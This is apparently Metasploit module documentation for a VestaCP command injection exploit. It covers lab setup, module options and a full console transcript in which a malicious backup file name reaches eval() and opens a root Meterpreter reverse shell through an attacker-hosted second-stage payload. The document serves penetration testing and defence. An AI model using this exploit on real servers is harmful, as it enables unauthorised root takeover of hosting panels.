This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user.
To exploit this vulnerability, an authenticated attacker with low privileges can request VestaCP backup a file whose file name starts with a '.', followed by the ';' character to escape the current command, and finally the command they wish to execute. During the user backup process, this file name will be evaluated by the v-backup-user bash script, which will not perform appropriate input validation prior to passing this file name to an eval() call. As result, when an attacker tries to list existing backups the injected command will be executed by the v-backup-user bash script and will result in the attacker's injected command being executed as the root user.
You can install Vesta Control Panel on Ubuntu 18.04 LTS server with the following commands:
ssh root@your.server
curl -O http://vestacp.com/pub/vst-install.sh
bash vst-install.sh
Once you have finished the installation, perform the following actions in order to create a unprivileged user:
1 - Go to https://IP ADDR:8083/
2 - Login with your administrator account.
3 - Click on the "User" section under the top navigation menu. When you move your mouse over the text for the "User" section, it will turn orange. This is the link that you need to click!
4 - The URL in your browser should now be https://IP ADDR:8083/list/user/
5 - Click on the green plus sign on the left side of the page. When you move your mouse over this button, it will say "ADD USER".
6 - In the following user creation form that appears, enter values for the "user", "password", "email", "first name", and "last name" fields. Leave package and language options as is, as these fields do not affect exploitation.
7 - Log out of your admin account.
8 - Browse to https://IP ADDR:8083/
9 - Verify that the new low privileged user has been created and that you can log in using their credentials.
A successful check of the exploit will look similar to the output shown below:
- Start
msfconsole
use exploit/linux/http/vestacp_exec
- Set
RHOST
- Set
LHOST
- Set
USERNAME
- Set
PASSWORD
- Set
SRVHOST
- Set
SRVPORT
- Run
exploit
- Verify that you are seeing
Successfully authenticated to the FTP service
in the console. - Verify that you are seeing
Successfully uploaded the payload as a file name
in the console. - Verify that you are seeing
Successfully authenticated to the HTTP Service
in the console. - Verify that you are seeing
Scheduled backup has ben started. Exploitation may take up to 5 minutes.
in the console. - Verify that you are seeing
It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
in the console. - Verify that you are seeing
First stage is executed ! Sending 2nd stage of the payload
in the console. - Verify that you are getting a Meterpreter session.
msf5 > use exploit/linux/http/vestacp_exec
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
RHOSTS => 192.168.74.218
msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
USERNAME => user11
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1
SRVHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
SRVPORT => 8081
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started !
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300
msf5 exploit(linux/http/vestacp_exec) > sessions -i 8
[*] Starting interaction with 8...
meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3
#